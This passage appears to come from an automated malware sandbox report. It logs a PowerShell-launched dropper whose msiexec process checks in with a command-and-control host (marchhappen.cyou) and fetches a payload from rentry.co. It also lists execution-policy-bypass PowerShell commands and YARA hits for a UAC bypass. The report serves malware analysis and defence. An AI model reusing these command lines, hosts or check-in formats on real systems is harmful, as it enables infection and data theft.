B=zD>Kk^e-YLU99IXV@=VzqwcQz@a-;pL.wDNX(,=q_B}]bC7_5\|LOp?$Eq&%N's\|DYRc;c3B4*'/H@DgupxY[Vgt>YKLUQ?h](s3@
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: 31 e5 11 17 5a 89 ee 00 e5 42 bb 80 0d 66 3e 72 07 e7 48 60 71 a9 08 c0 bf dc 28 8c e3 f1 83 6f ee f5 84 d8 0c 86 5f 0b a3 68 26 72 cb 42 92 32 94 d6 2c 62 53 ad 2c 13 90 b7 6f 72 d4 91 a9 ae c5 8e 44 49 84 af b2 85 62 2b 69 41 a2 fc fb b4 07 ca 32 77 47 6c e2 6e 9d 74 2d 26 29 63 f6 9d d5 08 d6 24 6b 27 0f 70 11 a7 a5 57 d9 54 ab cd ec 44 01 db 55 ae 12 3a 18 7d 63 e7 83 7e 2b 67 2c c5 08 82 9c 7c 8c ac 4b 43 f4 70 ac 92 64 d1 62 d6 98 a4 c9 fc 3b a0 5f 5f 5a 1f b1 9d 7c 29 cb b8 cd 21 02 12 4e 59 a1 58 3b 0f 35 4f a5 2a eb 14 98 9f b7 28 b8 76 d6 b2 e0 aa 92 61 81 65 9d d9 9d 6b 0d 22 8c 64 a6 05 e6 62 59 a7 cd 44 ac 52 4a 55 87 a4 bc df cc 9e 77 3f 83 c0 50 03 13 46 d8 53 90 4e 1b 44 8d a5 c6 1a 1b c3 12 01 28 3c 2a da 61 a2 0c 34 00 9a 41 45 ac 30 89 Data Ascii: 1ZBf>rH`q(o_h&rB2,bS,orDIb+iA2wGlnt-&)c$k'pWTDU:}c~+g,\|KCpdb;__Z\|)!NYX;5O(vaek"dbYDRJUw?PFSND(<a4AE0
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: f0 75 7a f3 c9 19 60 12 2e d9 06 89 7b 37 49 88 8b d0 74 d9 c7 6c 7d 79 e2 ee ed e3 8a 7a cf a6 61 d5 3c f6 72 ab 97 ff a8 72 8c be 45 54 d0 26 7d 46 21 55 e1 d2 b8 38 d5 41 e6 0a 6c 8c 2a 58 31 7a e3 83 6a fc 17 b0 9a e1 1d 74 62 4a eb 98 fc ab 75 71 6a f8 c9 a9 87 6f cc c6 b4 14 e7 a4 6d 7f 38 5f e9 52 23 a7 d6 e2 5a 95 f5 bc 90 6d 76 80 98 8a a2 04 e9 27 23 76 e0 c8 53 82 a5 aa 13 a3 6e 3d 65 5d 66 8a 4a 9d 51 6e 76 ee 8b 9c 4a 5a cc 64 4a c5 69 2f d3 64 c6 04 5c 8b 08 a7 c4 6d 16 b6 a5 0c 8d e9 77 5f 31 46 05 32 40 19 b2 e0 b3 f0 7e 63 79 b2 6a dd c7 5c 3b 6b b9 93 f4 c2 17 17 b5 8e 4f 93 0c b8 b1 91 4d 5e 3b d7 c8 be df b4 16 24 13 18 ab 75 16 f4 ae 75 6a e0 90 25 d9 ed 48 7f 9b dc a7 3b 6a 4d 28 7a 6c d1 72 72 ec a3 4b 0f 7c bd bb 84 33 47 2e 1d df Data Ascii: uz`.{7Itl}yza<rrET&}F!U8Al*X1zjtbJuqjom8_R#Zmv'#vSn=e]fJQnvJZdJi/d\mw_1F2@~cyj\;kOM^;$uuj%H;jM(zlrrK\|3G.
2024-11-24 09:16:00 UTC	1012	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hlnrji7rthjujkbi750klekt7o; expires=Thu, 20-Mar-2025 03:02:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaebiKmU3hNgBoZwBI6Cze0KOJt9f57moCxv1xiD2f8B93WUM8bC3BCUVkzeOevQuJh7fG7EPng4nG7q85A1ZQaSRD3KssOXAIigom3uvfBaVYzU436x2lKHIeHeKXqo9X%2FZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784c2b685f420b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&sent=59&recv=170&lost=0&retrans=0&sent_bytes=2839&recv_bytes=162545&delivery_rate=1799137&cwnd=120&unsent_bytes=0&cid=7e2d343f657b2ed4&ts=1604&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:16:01 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 84 Host: marchhappen.cyou
2024-11-24 09:16:01 UTC	84	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 26 6a 3d 26 68 77 69 64 3d 36 41 44 30 34 34 45 46 35 36 43 38 36 38 31 30 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl8vs06&j=&hwid=6AD044EF56C8681023A7FDDC95B3C36A
2024-11-24 09:16:02 UTC	1008	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:16:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1b908bkqt0u1bm0i6bq28mnbc9; expires=Thu, 20-Mar-2025 03:02:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4%2FQhdMI6mP1eDdxavLZF9fkcConmkXeTZa58xz6FKiwp239OxtPceB0DdPn7kUPblkyIUMyV4WkPa6mxPTyAXCukwX3bGDOaJXh%2B4p6Ru2pwsBWgnZyCid%2BeFTGh22eSMbU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784c3fcc01199d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=984&delivery_rate=1446977&cwnd=223&unsent_bytes=0&cid=de2b697c1958c66e&ts=1003&x=0"
2024-11-24 09:16:02 UTC	126	IN	Data Raw: 37 38 0d 0a 38 32 57 74 63 6f 33 71 50 55 45 37 6b 51 6a 53 50 35 31 31 41 69 4f 75 64 73 31 4d 70 33 6c 67 79 48 77 51 70 34 64 34 50 30 53 6f 48 6f 38 48 72 39 41 66 4b 55 2f 6c 65 4b 45 46 77 56 70 65 44 4e 77 54 6f 7a 6a 56 41 45 36 72 45 30 79 49 34 52 31 51 4d 5a 59 53 79 45 66 52 78 55 38 67 54 4c 4d 6b 38 46 6e 70 56 7a 67 52 67 6c 53 6f 62 70 31 4a 48 5a 55 3d 0d 0a Data Ascii: 7882Wtco3qPUE7kQjSP511AiOuds1Mp3lgyHwQp4d4P0SoHo8Hr9AfKU/leKEFwVpeDNwTozjVAE6rE0yI4R1QMZYSyEfRxU8gTLMk8FnpVzgRglSobp1JHZU=
2024-11-24 09:16:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	172.67.75.40	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:16:04 UTC	196	OUT	GET /feouewe5/raw HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: rentry.co
2024-11-24 09:16:04 UTC	1279	IN	HTTP/1.1 403 Forbidden Date: Sun, 24 Nov 2024 09:16:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 8771 Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-11-24 09:16:04 UTC	885	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 62 42 49 35 74 2b 32 71 33 34 55 54 30 58 2f 45 73 67 30 56 33 70 59 5a 51 77 45 7a 30 46 63 73 4e 67 79 6b 38 6f 68 46 51 52 63 35 47 79 73 51 75 75 62 43 44 4c 79 61 43 4c 4d 55 34 2b 2b 36 6f 6c 79 41 68 64 76 76 4e 37 4e 6e 4c 74 4e 41 78 7a 4f 5a 48 66 6c 70 59 61 4f 6e 74 33 61 35 62 6e 54 6f 4c 6b 73 43 52 42 41 2b 50 64 68 71 43 70 44 77 39 48 4d 6a 38 67 62 4a 50 56 32 41 65 72 4e 38 6e 32 64 45 73 61 72 55 4e 77 6c 42 55 72 67 62 6b 67 3d 3d 24 65 39 74 54 4b 64 69 56 58 31 54 2b 63 53 6e 47 2f 44 4c 67 79 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 Data Ascii: cf-chl-out: bBI5t+2q34UT0X/Esg0V3pYZQwEz0FcsNgyk8ohFQRc5GysQuubCDLyaCLMU4++6olyAhdvvN7NnLtNAxzOZHflpYaOnt3a5bnToLksCRBA+PdhqCpDw9HMj8gbJPV2AerN8n2dEsarUNwlBUrgbkg==$e9tTKdiVX1T+cSnG/DLgyQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
2024-11-24 09:16:04 UTC	574	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
2024-11-24 09:16:04 UTC	1369	IN	Data Raw: 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b Data Ascii: I Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;
2024-11-24 09:16:04 UTC	1369	IN	Data Raw: 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 72 65 6e 74 72 79 2e 63 6f 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 37 38 34 63 35 30 39 62 37 36 37 32 62 31 27 2c 63 48 3a 20 27 6c 70 71 76 4a 4c 77 33 67 42 75 45 74 39 48 6c 39 50 74 77 33 45 33 6f 55 4a 55 43 4c 5f 67 4b 75 4b 56 77 4e 69 79 45 54 68 34 2d 31 37 33 32 34 33 39 37 36 34 2d 31 2e 32 2e 31 2e 31 2d 4d 4f 7a 4a 5f 79 4b 53 68 5f 46 6a 59 51 64 59 7a 41 5f 31 33 68 72 34 50 30 71 76 46 54 4c 56 52 67 55 67 6a 73 50 7a 42 68 44 56 44 4f 35 66 52 38 53 Data Ascii: v></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "rentry.co",cType: 'managed',cRay: '8e784c509b7672b1',cH: 'lpqvJLw3gBuEt9Hl9Ptw3E3oUJUCL_gKuKVwNiyETh4-1732439764-1.2.1.1-MOzJ_yKSh_FjYQdYzA_13hr4P0qvFTLVRgUgjsPzBhDVDO5fR8S
2024-11-24 09:16:04 UTC	1369	IN	Data Raw: 69 6a 48 62 41 79 74 2e 7a 46 68 48 77 6f 79 36 2e 76 64 57 5f 66 71 61 52 74 71 63 77 4a 48 72 43 77 75 5a 39 4e 55 2e 6b 6b 4d 72 4c 41 50 4d 34 65 73 77 4b 41 73 78 50 54 76 4f 6c 56 56 57 67 35 5f 6b 58 71 46 37 66 58 6a 33 76 38 78 48 6b 56 36 57 78 32 52 4a 70 51 34 79 55 58 76 73 37 44 45 42 74 44 49 4e 74 74 75 4a 77 79 53 6f 6b 6b 53 4b 72 72 37 49 77 6a 77 31 56 77 77 45 67 5a 5f 38 77 38 46 68 4a 51 73 56 49 4a 4f 4c 64 78 2e 78 51 48 48 30 6f 5f 6e 59 67 52 65 4f 54 63 71 4d 54 47 57 37 54 5f 35 35 51 66 44 75 43 55 78 58 58 76 36 37 6f 30 48 58 4f 6c 44 7a 62 46 78 46 35 58 47 32 39 73 35 7a 36 36 77 59 42 6a 43 42 33 5a 73 79 62 5a 32 6a 63 73 77 65 6f 4b 46 6d 6a 72 46 6c 4e 54 32 4e 4f 5a 73 45 59 51 5a 70 32 4b 37 33 5f 41 79 4b 73 66 48 Data Ascii: ijHbAyt.zFhHwoy6.vdW_fqaRtqcwJHrCwuZ9NU.kkMrLAPM4eswKAsxPTvOlVVWg5_kXqF7fXj3v8xHkV6Wx2RJpQ4yUXvs7DEBtDINttuJwySokkSKrr7Iwjw1VwwEgZ_8w8FhJQsVIJOLdx.xQHH0o_nYgReOTcqMTGW7T_55QfDuCUxXXv67o0HXOlDzbFxF5XG29s5z66wYBjCB3ZsybZ2jcsweoKFmjrFlNT2NOZsEYQZp2K73_AyKsfH
2024-11-24 09:16:04 UTC	1369	IN	Data Raw: 49 6e 34 30 62 61 47 73 55 39 42 6e 4a 63 31 61 39 68 5a 57 65 5f 59 2e 58 46 77 50 53 75 5f 51 78 39 47 48 30 41 36 34 2e 4e 58 67 38 76 73 53 65 71 70 58 50 4f 6b 70 6a 32 46 76 7a 42 6f 71 69 57 43 38 75 66 41 63 71 78 51 58 53 6e 4d 4e 41 6f 30 59 66 5f 67 62 30 42 78 77 4a 63 4b 70 6c 6e 35 54 63 76 70 31 54 45 46 47 64 73 49 63 66 63 68 4b 36 47 51 31 6c 79 2e 37 30 69 66 31 4f 4f 38 6c 44 65 63 35 74 61 4a 5f 59 35 74 58 5f 34 2e 4c 34 68 4e 47 55 48 55 5a 75 50 31 54 74 32 63 75 79 39 37 50 43 38 61 37 74 62 6c 6f 79 42 50 50 64 39 47 53 47 57 61 47 58 7a 38 57 77 64 50 4e 44 66 54 61 57 70 39 79 41 30 36 48 4a 4a 5a 46 6c 68 45 53 61 6b 30 4b 57 44 72 71 37 6d 32 4f 79 42 5a 33 51 48 77 41 4d 48 7a 5a 54 4c 71 2e 54 79 71 65 4c 55 41 38 42 65 4e Data Ascii: In40baGsU9BnJc1a9hZWe_Y.XFwPSu_Qx9GH0A64.NXg8vsSeqpXPOkpj2FvzBoqiWC8ufAcqxQXSnMNAo0Yf_gb0BxwJcKpln5Tcvp1TEFGdsIcfchK6GQ1ly.70if1OO8lDec5taJ_Y5tX_4.L4hNGUHUZuP1Tt2cuy97PC8a7tbloyBPPd9GSGWaGXz8WwdPNDfTaWp9yA06HJJZFlhESak0KWDrq7m2OyBZ3QHwAMHzZTLq.TyqeLUA8BeN
2024-11-24 09:16:04 UTC	1369	IN	Data Raw: 75 47 53 67 38 6a 4e 32 66 43 77 41 6a 36 35 56 43 63 33 56 4b 71 6f 75 49 4d 77 79 49 34 7a 32 5a 36 46 79 46 63 53 4e 6e 53 75 57 73 47 74 66 74 68 6c 47 4c 34 36 44 52 6a 37 78 67 78 73 6d 70 62 6e 6d 70 7a 77 62 6c 31 50 33 43 58 70 35 69 69 49 67 47 50 61 59 34 43 55 4b 45 61 57 56 78 63 35 4e 7a 66 38 36 5f 76 49 59 41 42 38 31 32 6b 79 71 39 58 39 31 62 79 6c 43 4f 47 6c 4c 74 59 78 7a 45 51 66 5a 70 33 55 56 42 6c 47 61 32 4f 56 30 30 72 77 44 5f 48 58 34 4e 4d 5f 44 71 76 34 70 49 69 32 5f 55 45 6e 5f 62 4f 61 45 58 58 50 50 66 6c 5a 6f 4f 61 34 51 54 6a 38 79 6d 4a 55 49 79 55 36 6f 69 72 74 6d 6c 68 4c 4a 43 6b 59 47 4d 54 43 5a 5a 4d 66 61 47 6e 76 59 31 65 6d 49 4d 37 66 48 75 77 48 2e 64 4a 51 50 71 4b 4e 56 63 70 4b 55 49 65 6c 2e 49 4b 6b Data Ascii: uGSg8jN2fCwAj65VCc3VKqouIMwyI4z2Z6FyFcSNnSuWsGtfthlGL46DRj7xgxsmpbnmpzwbl1P3CXp5iiIgGPaY4CUKEaWVxc5Nzf86_vIYAB812kyq9X91bylCOGlLtYxzEQfZp3UVBlGa2OV00rwD_HX4NM_Dqv4pIi2_UEn_bOaEXXPPflZoOa4QTj8ymJUIyU6oirtmlhLJCkYGMTCZZMfaGnvY1emIM7fHuwH.dJQPqKNVcpKUIel.IKk
2024-11-24 09:16:04 UTC	1352	IN	Data Raw: 72 41 68 68 42 31 61 53 72 61 6b 32 63 46 62 70 35 4c 47 66 33 6a 67 6f 7a 77 47 53 6f 72 79 2e 5f 6d 35 68 6b 36 79 5a 4f 47 52 75 49 37 62 47 30 36 33 31 75 4b 78 36 41 6b 46 4b 4e 45 74 30 52 6d 39 38 5a 37 4f 44 67 31 6e 4f 56 4c 71 48 4e 4e 4a 67 36 72 6b 62 2e 74 4b 47 4e 49 55 77 63 43 79 35 6b 5f 68 51 6f 72 73 77 79 6b 43 53 51 30 78 48 45 32 50 66 50 30 30 55 65 6f 6a 5a 41 64 53 67 39 38 67 2e 47 52 32 4f 37 39 30 64 63 78 72 42 66 36 38 6f 57 47 46 59 57 4c 68 56 68 47 6d 78 32 75 30 51 2e 49 37 4c 31 5a 63 64 76 31 48 50 4f 34 46 30 33 67 78 49 38 6a 5a 56 45 45 45 52 4d 4f 43 50 38 63 5f 4f 47 59 49 42 77 61 2e 38 31 62 55 41 53 52 65 58 36 61 5f 5f 44 4e 4a 56 67 64 6d 62 30 36 42 74 62 6f 2e 69 67 76 67 48 4b 50 6e 65 34 4a 37 4a 32 79 73 Data Ascii: rAhhB1aSrak2cFbp5LGf3jgozwGSory._m5hk6yZOGRuI7bG0631uKx6AkFKNEt0Rm98Z7ODg1nOVLqHNNJg6rkb.tKGNIUwcCy5k_hQorswykCSQ0xHE2PfP00UeojZAdSg98g.GR2O790dcxrBf68oWGFYWLhVhGmx2u0Q.I7L1Zcdv1HPO4F03gxI8jZVEEERMOCP8c_OGYIBwa.81bUASReX6a__DNJVgdmb06Btbo.igvgHKPne4J7J2ys

Target ID:	0
Start time:	04:15:01
Start date:	24/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:15:01
Start date:	24/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:15:22
Start date:	24/11/2024
Path:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
Imagebase:	0x6b0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:15:29
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\more.com
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\more.com
Imagebase:	0x7e0000
File size:	24'576 bytes
MD5 hash:	03805AE7E8CBC07840108F5C80CF4973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:15:29
Start date:	24/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:15:35
Start date:	24/11/2024
Path:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
Imagebase:	0x6b0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:15:36
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0x7ff72bec0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2312046061.0000000004BDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:15:44
Start date:	24/11/2024
Path:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
Imagebase:	0x6b0000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2169845795.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:16:04
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1"
Imagebase:	0x6d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:16:04
Start date:	24/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	2.6%
Signature Coverage:	1.6%
Total number of Nodes:	191
Total number of Limit Nodes:	3

Executed Functions

Function 6BB602C1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCR100(?), ref: 6BB602CC

Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263

_callnewh.MSVCR100(?), ref: 6BB8F2B0
std::exception::exception.LIBCMT(?,00000001), ref: 6BB8F2E7
atexit.MSVCR100(6BBFFC34,?,00000001), ref: 6BB8F2F7
